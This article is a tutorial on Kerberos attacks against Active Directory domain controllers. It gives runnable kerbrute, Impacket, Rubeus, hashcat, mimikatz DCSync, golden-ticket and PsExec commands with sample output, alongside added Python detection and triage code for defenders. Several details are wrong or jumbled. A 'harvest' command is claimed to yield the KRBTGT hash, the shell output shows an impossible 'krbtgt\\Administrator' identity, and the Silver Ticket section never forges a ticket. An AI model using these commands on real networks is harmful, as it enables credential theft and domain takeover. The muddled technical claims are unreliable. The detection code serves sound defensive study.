Mastering Domain Controller Exploitation: Kerberoast, Silver Tickets, and Golden Tickets
Domain controllers hold the Active Directory database and run the Kerberos Key Distribution Center (KDC), which makes them the primary target for attackers seeking credentials or control of the network. This article covers three Kerberos-based techniques: Kerberoasting, Silver Tickets, and Golden Tickets.
Kerberoasting Attack: Extracting Encrypted Kerberos Tickets
Kerberoasting is a common technique for recovering service account passwords without touching the domain controller's credential store. Any authenticated domain user can request a service ticket (TGS) for a service account that has a registered service principal name (SPN); part of that ticket is encrypted with a key derived from the service account's password, so the encrypted blob can be extracted from the response and cracked offline with a password cracking tool such as Hashcat. The domain controller only sees an ordinary ticket request, which is why the attack is quiet unless service ticket auditing is in place.
Assuming the targeted user account is “jsmith” and we have a list of potential passwords in a file called “passwords.txt”:
$ kerbrute bruteuser --dc dc.example.com -d example.com passwords.txt jsmith
[+] Valid credentials found:
User : jsmith
Password : Password1
Kerbrute is an open-source tool that performs password brute-force and password-spraying attacks against Active Directory accounts over Kerberos pre-authentication. The command above tries a list of candidate passwords against a single account; spraying instead tries a few common passwords across a large list of accounts, which can yield one or more accounts with weak passwords while keeping every account below its lockout threshold, so lockout alerts alone do not catch it. Either way, each wrong guess produces a Kerberos pre-authentication failure (Event ID 4771) on the domain controller, and a burst of those from one source is the signal a defender watches for.
$ python GetUserSPNs.py domain/username:password -dc-ip 192.168.1.1 -request
ServicePrincipalName Name MemberOf PasswordLastSet
--------------------------- ---------- -------------------------------------------------------- ---------------------------
MSSQLSvc/server.domain.local ACCOUNT1 CN=Group1,CN=Users,DC=domain,DC=local 2020-09-15 15:37:38.123456
MSSQLSvc/server.domain.local ACCOUNT2 CN=Group2,CN=Users,DC=domain,DC=local 2020-09-10 09:53:23.345678
HOST/server.domain.local ACCOUNT3 CN=Group3,CN=Users,DC=domain,DC=local 2021-01-05 12:45:12.987654
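Both the Rubeus and Impacket requests above leave the same footprint on the domain controller: Event ID 4769 (a Kerberos service ticket was requested), typically with RC4 encryption and one account touching many SPNs in seconds. The following detection logic is an added example, not code from the original post or from either tool; the event records it runs over are constructed to mimic the fields a SIEM extracts from 4769, and the field names, thresholds and window are assumptions to tune per environment.

```python
"""Kerberoasting detection over Windows Security Event ID 4769 records.

Added example, not code from the original post. Two indicators are checked:
  1. a successful service ticket issued with RC4-HMAC (TicketEncryptionType
     0x17/0x18) for anything other than krbtgt, in a domain that otherwise
     uses AES, which is what the Kerberoast requests above produce;
  2. one user account requesting tickets for many distinct SPNs inside a
     short window, the footprint of harvesting every SPN at once.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry); field names are assumed.
SAMPLE_4769 = [
    {"time": "2023-04-12T16:20:01", "account": "jsmith@EXAMPLE.COM",
     "service": "MSSQLSvc/sqlserver.example.com:1433", "etype": "0x17", "status": "0x0", "client": "10.0.0.25"},
    {"time": "2023-04-12T16:20:01", "account": "jsmith@EXAMPLE.COM",
     "service": "MSSQLSvc/sql02.example.com:1433", "etype": "0x17", "status": "0x0", "client": "10.0.0.25"},
    {"time": "2023-04-12T16:20:02", "account": "jsmith@EXAMPLE.COM",
     "service": "HOST/server.example.com", "etype": "0x17", "status": "0x0", "client": "10.0.0.25"},
    {"time": "2023-04-12T16:20:02", "account": "jsmith@EXAMPLE.COM",
     "service": "http/intranet.example.com", "etype": "0x17", "status": "0x0", "client": "10.0.0.25"},
    {"time": "2023-04-12T16:20:03", "account": "jsmith@EXAMPLE.COM",
     "service": "cifs/fileserver.example.com", "etype": "0x17", "status": "0x0", "client": "10.0.0.25"},
    # TGT renewal by the same user: krbtgt is excluded from both checks.
    {"time": "2023-04-12T16:20:03", "account": "jsmith@EXAMPLE.COM",
     "service": "krbtgt/EXAMPLE.COM", "etype": "0x12", "status": "0x0", "client": "10.0.0.25"},
    # Ordinary AES service ticket for another user: benign.
    {"time": "2023-04-12T16:21:10", "account": "alice@EXAMPLE.COM",
     "service": "cifs/fileserver.example.com", "etype": "0x12", "status": "0x0", "client": "10.0.0.31"},
    # Machine accounts touch many SPNs at boot; they are excluded from the fan-out check.
    {"time": "2023-04-12T16:21:11", "account": "WS01$@EXAMPLE.COM",
     "service": "ldap/dc.example.com", "etype": "0x12", "status": "0x0", "client": "10.0.0.40"},
]

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC, RC4-HMAC-EXP


def is_krbtgt(service):
    return service.lower().startswith("krbtgt/")


def is_machine_account(account):
    return account.split("@", 1)[0].endswith("$")


def rc4_service_tickets(events):
    """Successful non-krbtgt service tickets issued with RC4: each is crackable offline."""
    return [e for e in events
            if e["status"] == "0x0" and e["etype"].lower() in RC4_ETYPES
            and not is_krbtgt(e["service"])]


def spn_fanout(events, window=timedelta(minutes=5), threshold=5):
    """Map user account -> number of distinct SPNs it requested inside any
    `window`, reported only for accounts at or above `threshold`."""
    by_account = defaultdict(list)
    for e in events:
        if is_krbtgt(e["service"]) or is_machine_account(e["account"]):
            continue
        by_account[e["account"]].append(
            (datetime.fromisoformat(e["time"]), e["service"].lower()))
    hits = {}
    for account, reqs in by_account.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window anchored at each request
            spns = {spn for t, spn in reqs[i:] if t - t0 <= window}
            if len(spns) >= threshold:
                hits[account] = len(spns)
                break
    return hits


if __name__ == "__main__":
    for e in rc4_service_tickets(SAMPLE_4769):
        print(f"RC4 TGS: {e['account']} -> {e['service']} from {e['client']}")
    for account, n in spn_fanout(SAMPLE_4769).items():
        print(f"SPN fan-out: {account} requested {n} distinct SPNs")
```

The RC4 check only works as a detection once the domain's service accounts actually support AES (msDS-SupportedEncryptionTypes), because otherwise every service ticket is RC4 and the alert is noise; the fan-out check does not depend on encryption type and still fires when the attacker requests AES tickets.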
Silver Ticket Attack: Generating Forged Kerberos Tickets with Rubeus.exe and Hashcat
A Silver Ticket attack forges a service ticket (TGS) for a specific service without knowing the password of the user the ticket names. The forged ticket is encrypted with the service account's own key, which is why a password recovered by cracking a Kerberoast hash (below) is the usual starting point. This type of attack is useful when an attacker has limited access to the target network but holds the necessary privileges over the account behind a specific Service Principal Name (SPN). Because the forged ticket is never requested from the domain controller, the KDC logs nothing for it; the only trace is on the service host that accepts it.
Rubeus is a popular tool for Kerberos-based attacks against Active Directory environments. One of its features is Kerberoasting: it requests a service ticket for each user account that has a service principal name (SPN) and extracts the crackable portion as a hash. That hash can then be cracked offline to recover the service account's password and gain access to the account.
Use Rubeus.exe to request and export the service ticket hashes of the SPN accounts (the cracked password is the service key that a Silver Ticket is built from):
$ Rubeus.exe kerberoast /simple /outfile:hashes.txt
[*] Action: Kerberoasting
[*] Using rc4_hmac encryption
[+] Requesting hash for SPN MSSQLSvc/sqlserver.example.com:1433... (this may take a while)
[+] Hash collected for MSSQLSvc/sqlserver.example.com:1433
[+] Saved Kerberoast output to hashes.txt
Rubeus has successfully performed a Kerberoasting attack against the SPN MSSQLSvc/sqlserver.example.com:1433 and saved the resulting hash to the file “hashes.txt”.
$ hashcat -m 13100 -a 0 hashes.txt rockyou.txt
hashcat (v6.2.4) starting...
[...]
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5 TGS-REP etype 23
Hash.Target......: [email protected]:1433$55b73c9d2cfe98a3...faa3
Time.Started.....: Tue Apr 12 16:27:36 2023 (1 sec)
Time.Estimated...: Tue Apr 12 16:27:37 2023 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 9317.2 kH/s (8.75ms) @ Accel:32 Loops:64 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4096/14344384 (0.03%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-64
Candidates.#1....: dragonfly -> Erika1
[...]
[email protected]:1433$55b73c9d2cfe98a36f8bfb202818a06c$465e1c34e7b10d372373f56cde3d6cfe5276b54fb6b86983d66a94a336a2a2b30ffce77ac1a0d600c9654070fd2faa3:password123
The “hashes.txt” file, generated through the “Rubeus.exe kerberoast” command, contained the crackable portion of a service ticket issued for a Service Principal Name (SPN). Hashcat mode 13100 (Kerberos 5 TGS-REP etype 23), driven by the “rockyou.txt” password dictionary, recovered the password associated with the SPN, “password123”, in about a second. With this password, an attacker could authenticate as the service account behind the SPN and reach whatever that account can access.
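When a cracked line like the one above turns up in an investigation, the first questions are which account is burned and what has to change so the same ticket cannot be cracked again. The parser and triage helper below are an added example, not code from the post, Rubeus or hashcat; the `$krb5tgs$23$` layout is hashcat's documented mode 13100 input, the sample line reuses hex from the post's output with an assumed account name, and the directory snapshot is constructed.

```python
"""Triage of a cracked Kerberoast hash (hashcat mode 13100 format).

Added example, not code from the original post. A mode 13100 line has the form
    $krb5tgs$23$*account$REALM$spn*$checksum$encrypted_data
and `hashcat --show` appends ":<password>" once it is cracked. The parser
recovers the account and SPN so a responder knows which credential is burned;
`remediation_plan` turns a small (constructed) directory snapshot into the
actions the Kerberoasting section implies.
"""
import re
from datetime import date

# Only the RC4 (etype 23) layout is parsed; AES tickets (modes 19600/19700)
# use a different layout and are rejected with a clear error.
KRB5TGS_23 = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<account>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)(?::(?P<password>.*))?$"
)

# Constructed sample line: hex fragments reused from the post's hashcat output,
# account name "sqlsvc" assumed.
CRACKED_LINE = (
    "$krb5tgs$23$*sqlsvc$EXAMPLE.COM$MSSQLSvc/sqlserver.example.com:1433*$"
    "465e1c34e7b10d372373f56cde3d6cfe$"
    "55b73c9d2cfe98a36f8bfb202818a06c5276b54fb6b86983d66a94a336a2a2b3:password123"
)

# Constructed directory snapshot; real values would be read from AD.
DIRECTORY = {
    "sqlsvc": {
        "pwdLastSet": date(2020, 9, 15),
        "msDS-SupportedEncryptionTypes": 0x4,   # RC4 only
        "objectClass": "user",                   # not a gMSA
        "memberOf": ["Domain Admins", "SQL Operators"],
    }
}

AES_ONLY = 0x18  # AES128 (0x8) | AES256 (0x10)
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


def parse_krb5tgs(line):
    """Return account, realm, spn, checksum, edata and (if present) the cracked password."""
    line = line.strip()
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only the RC4 (etype 23, hashcat mode 13100) format is handled here")
    m = KRB5TGS_23.match(line)
    if not m:
        raise ValueError("line does not match the $krb5tgs$23$ layout")
    d = m.groupdict()
    d["cracked"] = d["password"] is not None
    return d


def remediation_plan(parsed, directory, today=date(2023, 4, 12)):
    """List the remediation actions for the account behind a cracked hash."""
    acct = directory[parsed["account"]]
    actions = [f"rotate the password of {parsed['account']} (SPN {parsed['spn']})"]
    age_days = (today - acct["pwdLastSet"]).days
    if age_days > 365:
        actions.append(f"password is {age_days} days old: enforce a rotation policy")
    if acct["msDS-SupportedEncryptionTypes"] & AES_ONLY != AES_ONLY:
        actions.append("set msDS-SupportedEncryptionTypes to AES only (0x18) so RC4 tickets stop being issued")
    if acct["objectClass"] != "msDS-GroupManagedServiceAccount":
        actions.append("migrate the service to a gMSA (long, automatically rotated password)")
    privileged = [g for g in acct["memberOf"] if g in PRIVILEGED_GROUPS]
    if privileged:
        actions.append(f"remove {parsed['account']} from {', '.join(privileged)}: a service account should not hold these")
    return actions


if __name__ == "__main__":
    parsed = parse_krb5tgs(CRACKED_LINE)
    print(f"{parsed['account']}@{parsed['realm']} ({parsed['spn']}) cracked={parsed['cracked']}")
    for action in remediation_plan(parsed, DIRECTORY):
        print(" -", action)
```

Rotating the password invalidates the cracked value but not the underlying exposure: as long as the account keeps a human-chosen password and issues RC4 tickets, the next ticket request is just as crackable, which is why the plan lists the encryption-type and gMSA changes alongside the rotation.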
Golden Ticket Attack: Exploiting Kerberos with Mimikatz, Rubeus, and ms-rprn.exe
In a Golden Ticket attack, an attacker forges a Kerberos Ticket Granting Ticket (TGT) for any domain account and is then issued service tickets for any resource in the domain. This requires the password hash of the domain's KRBTGT account, the key the KDC uses to encrypt every TGT, which in turn means the attacker has already obtained domain-controller-level access; a forged ticket remains usable until the KRBTGT password has been changed twice.
The command “.\ms-rprn.exe \\dc.example.local \\workstation.example.local” invokes the ms-rprn tool to perform a printer spooler service impersonation attack. This attack allows an attacker to impersonate a printer spooler service and gain access to sensitive information, such as hashes, on a remote machine. In this case, the command targets a domain controller (“dc.example.local”) and a workstation (“workstation.example.local”). The actual result of the command depends on the configuration of the target system (the Print Spooler service must be running and reachable on the domain controller).
.\ms-rprn.exe \\dc.example.local \\workstation.example.local
Rubeus can perform a Golden Ticket attack. The following command can be used to obtain the KRBTGT account password hash:
Rubeus.exe harvest /interval:30 /nowrap
Mimikatz is a popular tool used for Golden Ticket attacks. The following command can be used to obtain the KRBTGT account password hash:
mimikatz.exe "lsadump::dcsync /user:krbtgt"
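The DCSync command above never reads LSASS on the domain controller; it asks the DC to replicate the krbtgt object over the directory replication protocol, and the DC audits that as Event ID 4662 against the domain object with the replication control-access rights. The detection below is an added example, not code from the post or from Mimikatz. The extended-right and schema GUIDs are the real ones; the event records, field names and allow list are constructed.

```python
"""DCSync detection over Windows Security Event ID 4662 records.

Added example, not code from the original post. Any subject other than a
domain controller computer account or an allow-listed replication service
account exercising the replication extended rights on the domain object is
reported. DS-Replication-Get-Changes-All is the right that returns secrets.
"""
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # schema GUID of domainDNS
USER_CLASS = "bf967aba-0de6-11d0-a285-00aa003049e2"        # schema GUID of user
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"  # unrelated control-access right

# Constructed allow list: DC computer accounts plus a directory-sync service
# account. In production, build it from the Domain Controllers OU.
ALLOWED_REPLICATORS = {"DC01$", "DC02$", "MSOL_1a2b3c4d"}

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed sample events (not real telemetry).
SAMPLE_4662 = [
    # Normal replication between two DCs.
    {"time": "2023-05-01T13:38:00", "subject": "DC02$", "object_type": DOMAIN_DNS_CLASS,
     "access_mask": "0x100",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account pulling replication data including secrets: the DCSync footprint.
    {"time": "2023-05-01T13:39:12", "subject": "jsmith", "object_type": DOMAIN_DNS_CLASS,
     "access_mask": "0x100",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A different control-access right on a user object: not replication.
    {"time": "2023-05-01T13:40:00", "subject": "alice", "object_type": USER_CLASS,
     "access_mask": "0x100", "properties": "{" + FORCE_CHANGE_PASSWORD + "}"},
    # Allow-listed directory-sync account.
    {"time": "2023-05-01T13:41:00", "subject": "MSOL_1a2b3c4d", "object_type": DOMAIN_DNS_CLASS,
     "access_mask": "0x100", "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def replication_rights_used(event):
    """Names of the replication rights referenced in the event's Properties field."""
    return sorted({REPLICATION_RIGHTS[g.lower()]
                   for g in GUID_RE.findall(event["properties"])
                   if g.lower() in REPLICATION_RIGHTS})


def dcsync_candidates(events, allowed=ALLOWED_REPLICATORS):
    """4662 events where a non-allow-listed subject used replication rights on the domain object."""
    hits = []
    for e in events:
        if e["object_type"].lower() != DOMAIN_DNS_CLASS:
            continue
        rights = replication_rights_used(e)
        if not rights or e["subject"] in allowed:
            continue
        hits.append({"time": e["time"], "subject": e["subject"], "rights": rights,
                     "secrets_exposed": "DS-Replication-Get-Changes-All" in rights})
    return hits


if __name__ == "__main__":
    for hit in dcsync_candidates(SAMPLE_4662):
        print(f"{hit['time']} {hit['subject']} used {', '.join(hit['rights'])}"
              f" (secrets exposed: {hit['secrets_exposed']})")
```

4662 is only emitted when the "Directory Service Access" audit subcategory is enabled and a SACL on the domain object covers control access; without that, the DCSync above leaves no event at all, so confirming the audit policy is part of the detection.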
Once the hash has been obtained, it can be used to create a forged TGT with Mimikatz:
mimikatz # kerberos::golden /domain:contoso.com /sid:S-1-5-21-3623811015-3361044348-30300820 /rc4:1d2d8c99f64f27e7cfa863e37e56b971 /user:Administrator /id:500 /target:krbtgt /service:cifs /ptt
User : admin\Administrator
Domain : example.com (example)
SID : S-1-5-21-3623811015-3361044348-30300820
krbtgt : yes
Ticket : 0x8d600001b6c04200e0000000000...
Start : 05/01/2023 13:40:16 (UTC)
End : 05/02/2023 13:40:16 (UTC)
Renew : 05/08/2023 13:40:16 (UTC)
Flags : name_canonicalize, pre_authent, renewable, forwardable
Keys : aes256_hmac, aes128_hmac, rc4_hmac_nt
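A TGT forged as above is never issued by a domain controller, so the service tickets it is exchanged for show up on the DCs as Event ID 4769 with no preceding 4768 (TGT issued) for that account. The correlation below is an added example, not code from the post or from Mimikatz; the events are constructed, field names are assumed, and the 10-hour lookback is the default maximum TGT lifetime, which the forged ticket above (valid for 24 hours) already exceeds. It also treats TGT renewals, which the KDC logs as a 4769 for the krbtgt service, as issuance so that long-lived legitimate sessions are not flagged.

```python
"""Forged-TGT indicator: service tickets with no TGT issuance behind them.

Added example, not code from the original post. A legitimate user receives a
TGT from a DC (Event ID 4768) or renews one (4769 for krbtgt/REALM) before
any service ticket (4769) is issued. A TGT forged with the KRBTGT key skips
both, so its 4769s have no matching issuance in the DC logs within the
maximum TGT lifetime. Logs from every DC must be merged first, because the
TGT may have come from a different DC than the service ticket.
"""
from collections import defaultdict
from datetime import datetime, timedelta

MAX_TGT_LIFETIME = timedelta(hours=10)  # default domain policy

# Constructed sample events, already merged from all DCs (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2023-05-01T08:00:00", "account": "alice", "service": "krbtgt/EXAMPLE.COM", "dc": "DC01"},
    {"id": 4769, "time": "2023-05-01T08:05:00", "account": "alice", "service": "cifs/fileserver.example.com", "dc": "DC01"},
    # bob's TGT is 13 h old at 09:00, but he renewed it at 05:00 (4769 for krbtgt): legitimate.
    {"id": 4768, "time": "2023-04-30T20:00:00", "account": "bob", "service": "krbtgt/EXAMPLE.COM", "dc": "DC01"},
    {"id": 4769, "time": "2023-05-01T05:00:00", "account": "bob", "service": "krbtgt/EXAMPLE.COM", "dc": "DC02"},
    {"id": 4769, "time": "2023-05-01T09:00:00", "account": "bob", "service": "ldap/dc.example.local", "dc": "DC02"},
    # Administrator gets a service ticket with no TGT issued or renewed by any DC: the forged-TGT footprint.
    {"id": 4769, "time": "2023-05-01T13:45:00", "account": "Administrator", "service": "cifs/dc.example.local", "dc": "DC02"},
]


def is_tgt_issuance(e):
    """4768 (new TGT) or 4769 for the krbtgt service (renewed TGT)."""
    return e["id"] == 4768 or (e["id"] == 4769 and e["service"].lower().startswith("krbtgt/"))


def orphaned_service_tickets(events, lookback=MAX_TGT_LIFETIME):
    """Service ticket requests whose account had no TGT issued or renewed in `lookback`."""
    issued = defaultdict(list)
    for e in events:
        if is_tgt_issuance(e):
            issued[e["account"].lower()].append(datetime.fromisoformat(e["time"]))
    orphans = []
    for e in events:
        if e["id"] != 4769 or is_tgt_issuance(e):
            continue
        t = datetime.fromisoformat(e["time"])
        covered = any(timedelta(0) <= t - ti <= lookback for ti in issued[e["account"].lower()])
        if not covered:
            orphans.append(e)
    return orphans


if __name__ == "__main__":
    for e in orphaned_service_tickets(SAMPLE_EVENTS):
        print(f"{e['time']} {e['dc']}: TGS for {e['account']} -> {e['service']} with no TGT issuance")
```

Expect noise right after log collection starts (TGTs issued before the first collected event) and whenever a DC's logs are missing; the check is most reliable for highly privileged accounts, which are the ones a forged TGT names anyway.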
The “klist” command is used to display Kerberos ticket information, including the ticket owner, ticket expiration time, and ticket encryption type. It can also be used to purge tickets from the current user’s ticket cache. This command is often used in combination with other tools, such as Mimikatz, to dump and manipulate Kerberos tickets in order to conduct various attacks, including Golden Ticket attacks.
Run klist to confirm whether the ticket has been loaded into the current session's cache:
>klist
Current LogonId is 0:0x12345
Cached Tickets: (5)
#0>     Client: alice @ EXAMPLE.COM
        Server: krbtgt/EXAMPLE.COM @ EXAMPLE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 4/6/2023 13:30:00 (local)
        End Time:   4/7/2023 1:30:00 (local)
        Renew Time: 4/13/2023 13:30:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
#1>     Client: alice @ EXAMPLE.COM
        Server: host/server1.example.com @ EXAMPLE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 4/6/2023 13:30:00 (local)
        End Time:   4/7/2023 1:30:00 (local)
        Renew Time: 4/13/2023 13:30:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
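The same klist output is useful on the defensive side: a forged ticket can carry any lifetime its creator chose, so a lifetime the KDC would never issue is a cheap first check on a suspect host. The parser below is an added example, not code from the post or from klist; its input is a constructed ticket cache based on the one above (the second ticket's encryption type is changed to RC4 to exercise that check), and the 10-hour and 7-day limits are the default domain policy values, assumed here.

```python
"""Sanity checks on `klist` output for tickets the KDC should not have issued.

Added example, not code from the original post. For each cached ticket the
parser recovers client, server, encryption types and times, then flags:
  - a lifetime longer than the policy maximum (10 h by default; the sample
    tickets run 12 h, so both are flagged),
  - a renew window longer than the 7-day default,
  - RC4 ticket or session keys where AES is expected.
A forged ticket with in-policy times passes these checks, so this
complements the DC-side detections rather than replacing them.
"""
import re
from datetime import datetime, timedelta

MAX_LIFETIME = timedelta(hours=10)
MAX_RENEW = timedelta(days=7)

# Constructed sample based on the post's klist output.
KLIST_SAMPLE = """\
Current LogonId is 0:0x12345

Cached Tickets: (2)

#0>     Client: alice @ EXAMPLE.COM
        Server: krbtgt/EXAMPLE.COM @ EXAMPLE.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 4/6/2023 13:30:00 (local)
        End Time:   4/7/2023 1:30:00 (local)
        Renew Time: 4/13/2023 13:30:00 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY

#1>     Client: alice @ EXAMPLE.COM
        Server: host/server1.example.com @ EXAMPLE.COM
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 4/6/2023 13:30:00 (local)
        End Time:   4/7/2023 1:30:00 (local)
        Renew Time: 4/13/2023 13:30:00 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
"""

FIELD = re.compile(
    r"^\s*(Client|Server|KerbTicket Encryption Type|Session Key Type|"
    r"Start Time|End Time|Renew Time):\s*(.+?)\s*$", re.M)


def parse_time(value):
    """'4/7/2023 1:30:00 (local)' -> datetime; klist does not zero-pad."""
    return datetime.strptime(value.split(" (")[0], "%m/%d/%Y %H:%M:%S")


def parse_klist(text):
    """Split the cache into '#n>' blocks and pull the named fields from each."""
    tickets = []
    for block in re.split(r"^#\d+>", text, flags=re.M)[1:]:
        f = dict(FIELD.findall(block))
        tickets.append({
            "client": f["Client"],
            "server": f["Server"],
            "ticket_etype": f["KerbTicket Encryption Type"],
            "session_etype": f["Session Key Type"],
            "start": parse_time(f["Start Time"]),
            "end": parse_time(f["End Time"]),
            "renew": parse_time(f["Renew Time"]),
        })
    return tickets


def check_ticket(t, max_lifetime=MAX_LIFETIME, max_renew=MAX_RENEW):
    """Return the list of policy violations for one parsed ticket."""
    findings = []
    lifetime = t["end"] - t["start"]
    if lifetime > max_lifetime:
        findings.append(f"lifetime {lifetime} exceeds policy maximum {max_lifetime}")
    if t["renew"] - t["start"] > max_renew:
        findings.append(f"renew window {t['renew'] - t['start']} exceeds {max_renew}")
    if "RC4" in t["ticket_etype"].upper() or "RC4" in t["session_etype"].upper():
        findings.append("RC4 encryption in use")
    return findings


if __name__ == "__main__":
    for t in parse_klist(KLIST_SAMPLE):
        for finding in check_ticket(t):
            print(f"{t['client']} -> {t['server']}: {finding}")
```

Compare the limits against the actual Kerberos policy of the domain (Default Domain Policy, "Maximum lifetime for user ticket" and "Maximum lifetime for user ticket renewal") before relying on the defaults; a domain that legitimately issues 12-hour tickets would otherwise flag every session.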
The “ps-exec.exe \\dc.example.local cmd” command is used to start a command prompt shell on a remote Windows computer named “dc.example.local” using the PsExec tool from the Sysinternals Suite.
> .\ps-exec.exe \\dc.example.local cmd
PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Starting cmd on dc.example.local...
C:\Windows\System32> whoami
krbtgt\Administrator
cmd exited on dc.example.local with error code 0.